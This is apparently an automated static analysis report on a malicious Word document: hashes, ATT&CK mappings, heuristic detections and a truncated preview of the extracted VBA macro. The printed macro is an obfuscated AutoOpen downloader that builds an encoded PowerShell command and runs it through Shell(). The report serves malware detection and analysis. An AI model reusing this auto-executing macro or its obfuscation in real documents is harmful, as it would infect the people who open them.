Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0c1ae01e56a02531…

MALICIOUS

Office (OLE)

Size: 98.2 KB
Created: 2018-06-07 17:17:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: b8b82a6cd8f534515c761cafd7bd7728
SHA-1: ca643927a0134247c57b5de6cf523e2a127c3c1d
SHA-256: 0c1ae01e56a025315598deedc0cfbc1b7e027aad7dc6a0ee0bdf70babc9785c8
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic Autoopen macro that triggers a VBA macro. This VBA macro, in turn, calls the Shell() function to execute a PowerShell command. The PowerShell command appears to be obfuscated but likely downloads and executes a second-stage payload. The presence of Autoopen and Shell() calls strongly suggests malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Donoff-7167241-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Donoff-7167241-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12056 bytes
SHA-256: c8a0b3c249e4160b52daa22d3d1178578ee3c7a24fafed1101a7df7f5b819684
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zdXXRhCd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FAUzvR()
On Error Resume Next
SuPRpq = Tan(jfGWO _
* Tan(KFtQio * Int(csbikw * Sqr(86260) / SvEzE + Fix(16101)) / 90508 * Round(36198 / Log(45795 - GCjtf) + 70604 - HwIGN)) _
/ 84069 + Log(30248))
XNZShh = Tan(zsRjCY _
* Tan(RPmVw * Int(lFiMqL * Sqr(54774) / kFEEo + Fix(16015)) / 63885 * Round(90930 / Log(41764 - pmPFn) + 54325 - hwwisT)) _
/ 85007 + Log(90752))
FAUzvR = PHSXiDUsMkM + Shell(haiJnhoDMq + Chr(FcjBqHXHoY + vbKeyP + SDUWC) + MIqCuXCZPMl + SOznt + jwLRXE + fYVBulzEj + vvBrLIIG + OUiTL, 19077 - 19077)
DRiMbW = Tan(pMnMf _
* Tan(PcWum * Int(JMjRGQ * Sqr(16805) / iWrlM + Fix(17312)) / 1017 * Round(9171 / Log(29636 - JYThZ) + 85964 - PQTiW)) _
/ 15411 + Log(97279))
End Function
Sub Autoopen()
On Error Resume Next
MlbXzY = Tan(TIaSUB _
* Tan(WNLMF * Int(NMbnnR * Sqr(82962) / pfHOt + Fix(7031)) / 99346 * Round(45454 / Log(49010 - PsNFLH) + 12781 - zOuFW)) _
/ 18055 + Log(4227))
FAUzvR
UAJnj = Tan(jvddSE _
* Tan(zBwodz * Int(WIAUj * Sqr(30388) / cGjIw + Fix(24101)) / 60433 * Round(67981 / Log(98557 - lwjLS) + 52638 - oCwBNv)) _
/ 33389 + Log(87315))
End Sub



Attribute VB_Name = "prMzoHTQ"
Function MIqCuXCZPMl()
On Error Resume Next
itjbU = Tan(LXDPt _
* Tan(bAutk * Int(UVbFE * Sqr(34945) / LbwBw + Fix(52250)) / 33980 * Round(14141 / Log(30193 - BsKnzo) + 18140 - MwEUB)) _
/ 62906 + Log(85779))
hkQjlQksDWj = "owersHeLL" + " -e K" + "AB" + "uAEU" + "AVwAtAG8AYgB" + "KA"
bTHldo = Tan(XItOW _
* Tan(ocwLF * Int(BaRUhS * Sqr(647) / VzqaQI + Fix(41493)) / 99037 * Round(96681 / Log(99269 - RNiniF) + 49119 - zYUIJv)) _
/ 77118 + Log(82442))
RkBzpCCBanv = "EUA" + "Yw" + "BUACAA" + "IABTAFkA" + "cw" + "BUAGUAbQAuAGkAb" + "wAuAH"
KwaSd = Tan(sXRTwO _
* Tan(odwhnf * Int(nmOHf * Sqr(5216) / Brhic + Fix(33730)) / 40959 * Round(78769 / Log(99419 - LoRlP) + 24544 - aYLjqL)) _
/ 53730 + Log(15315))
nijzhjL = "MAVAByAGUAQQBNA" + "HIAZQBBAE" + "QARQB" + "SAC" + "gAKABuAEUAV"
TNXjS = Tan(acrjko _
* Tan(wQziX * Int(zNlXZ * Sqr(54135) / HqkKjF + Fix(43292)) / 36961 * Round(96461 / Log(15766 - QHXOp) + 89361 - cwEbvk)) _
/ 23446 + Log(76756))
jibPnfKvd = "wAtAG8AYgBKAE" + "UAYwBUACA" + "AIABTAHkAUwB0A" + "EUATQAuAGkA" + "TwAu" + "AGMAbwBNAFAAc"
Ivhpz = Tan(ljjrj _
* Tan(iSDwI * Int(OQwlYr * Sqr(78640) / icfvAw + Fix(84853)) / 99782 * Round(26976 / Log(46067 - STIWr) + 58770 - NiwfBd)) _
/ 74881 + Log(2864))
kqcBsjJc = "gBFAHMAUwBJAE" + "8AbgAuA" + "GQARQBmAGwA" + "QQB0AG" + "UA" + "UwBUAFIAR" + "QBhAG0AKAB" + "bAGkA"
XHXXqA = Tan(dIAnr _
* Tan(IiEfip * Int(FuGGa * Sqr(56699) / wwbCI + Fix(97290)) / 886 * Round(39205 / Log(85142 - AZSSfN) + 83173 - FfaTbW)) _
/ 90870 + Log(95240))
QFUnktp = "TwAuA" + "G0AZQ" + "BN" + "AG8AcgB5AH" + "MAdAByAGUAY" + "QBtAF" + "0A" + "WwBDAE8AbgBW" + "AGUAcgBUAF0AOgA"
sdBQwN = Tan(Bfhwft _
* Tan(nmNiIW * Int(ajPQUw * Sqr(61617) / WFGLMI + Fix(82294)) / 82521 * Round(51400 / Log(8393 - YQzfs) + 22173 - zmhOr)) _
/ 75234 + Log(51252))
VOLamOvdAhX = "6AEYAUgBP" + "AG0AYgBBA" + "FMARQA2" + "ADQAUwBUAFIAS" + "QBOAGcAKAAn" + "AFYAVgBCAHIAVAA" + "4AEo" + "AQQBFAFAAd"
RwmAbO = Tan(WJcrT _
* Tan(Zzvmav * Int(jaBWEI * Sqr(1094) / zHNTkX + Fix(81829)) / 88511 * Round(8751 / Log(51276 - zKtqDA) + 83733 - XpmcRr)) _
/ 54361 + Log(15430))
sWjqfINrIPL = "wByADkA" + "NgBGAEoASQBjAEo" + "AZABmAEE" + "AdQBOAGkAUQ" + "A4AGUAeABo" + "AGMATgBKAFUAR" + "wBOAGkAYgBsAG"
vPvTOU = Tan(BPYjI _
* Tan(DqLzzn * Int(kzVNbc * Sqr(8209) / fvbIP + Fix(99808)) / 96795 * Round(78115 / Log(60060 - jqVoo) + 54476 - XomvQ)) _
/ 38924 + Log(89831))
ZCouziOcRa = "UAV" + "gAzA" + "HYAUQAz" + "AHQAVw" + "A3AHAA"
MIqCuXCZPMl = hkQjlQksDWj + RkBzpCCBanv + nijzhjL + jibPnfKvd + kqcBsjJc + QFUnktp + VOLamOvdAhX + sWjqfINrIPL + ZCouziOcRa
End Function
Function SOznt()
On Error Resume Next
VGzuir = Tan(QN
... (truncated)